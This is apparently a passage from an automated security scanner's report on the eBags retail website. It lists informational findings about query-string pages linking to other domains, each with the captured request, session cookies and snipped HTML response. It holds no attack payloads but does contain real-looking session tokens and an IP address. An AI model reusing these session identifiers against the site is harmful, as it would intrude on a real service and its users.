Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 56187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/case_logic/nintendo_ds_174_game_case/product_detail/index.cfm?modelID=120654&productid=1312286"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/120654_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/nintendo_ds_trade_game_case/product_detail/index.cfm?modelID=126769&productid=1328568"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/126769_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/30_capacity_cd_visor/product_detail/index.cfm?modelID=57102&productid=641205"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/57102_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/sony_psp_174_game_case/product_detail/index.cfm?modelID=126770&productid=1328570"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/126770_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/portable_hard_drive_case/product_detail/index.cfm?modelID=138043&productid=1357927"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/138043_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=120654&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=126769&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=57102&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=126770&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=138043&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="84%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="58"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="85%" height="1"></td>
<td bgcolor="#999999" width="10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="15%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="88%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="61"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="89%" height="1"></td>
<td bgcolor="#999999" width="7"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="11%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="84%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="58"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="85%" height="1"></td>
<td bgcolor="#999999" width="10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="15%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="99%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="68"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="100%" height="1"></td>
<td bgcolor="#999999" width="0"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="0%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.8. http://www.ebags.com/info/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /info/index.cfm?fuseaction=contact HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:38 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:38 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 50424


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
</strong>&nbsp;&nbsp;&nbsp;
<a class="footertxt" id="_lpChatBtn1" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif' target='chat16136262' onClick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;" ><strong>
...[SNIP]...
</a> with a customer care agent.<a class="footertxt" id="_lpChatBtn1" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif' target='chat16136262' onClick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&imageURL=https://a248.e.akamai.net/f/248/124/4h/images.ebags.com/img/Header/LivePerson/reponline.gif&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;" ><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/20100419_OldLiveChat_Button.gif" alt="Live Chat" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.9. http://www.ebags.com/info/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /info/index.cfm?Fuseaction=overview HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=%00728AB%20A%3DB%20F28F1F31AC3; expires=Sun, 02-Jan-2011 14:19:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47079


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td>
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_triangle.gif" width=5 height=8>
</td>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8>&nbsp;<a href="/info/index.cfm?Fuseaction=amb_structure">
...[SNIP]...
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8>&nbsp;<a href="/info/index.cfm?Fuseaction=agreement">
...[SNIP]...
<td align="left"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8>&nbsp;<a href="/info/index.cfm?Fuseaction=amb_faqs">
...[SNIP]...
<td><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=5 height=8></td>
...[SNIP]...
</table>
<a href="https://signup.cj.com/member/brandedPublisherSignUp.do?air_refmerchantid=1206555"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate2.gif" border="0" vspace="10"></a>
...[SNIP]...
<br><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_js.gif" border="0" width="82" height="20" alt="JanSport">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_s.gif" border="0" width="45" height="36" alt="Samsonite">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_10549.gif" border="0" alt="Cole Haan">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_tnf.gif" border="0" width="41" height="39" alt="The North Face">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_579.gif" border="0" alt="Nike">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_v.gif" border="0" width="116" height="22" alt="Victorinox by Swiss Army">
<p><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_br.gif" border="0" width="105" height="32" alt="Briggs & Riley"><br>
...[SNIP]...
</h2>
eBags has partnered with Commission Junction, the leading solution provider to host our partner program. Visit <a href="http://www.CJ.com">CJ.com</a>
...[SNIP]...
<p><a href="https://signup.cj.com/member/brandedPublisherSignUp.do?air_refmerchantid=1206555"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_affiliate.gif" alt="Sign Up For eBags Partner Program" vspace="5" border="0"></a>
<br><a href="http://www.CJ.com"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/affiliate_logo_cj.gif" WIDTH="242" height="41" alt="Commission Junction" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.10. http://www.ebags.com/info/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /info/index.cfm?FuseAction=security HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
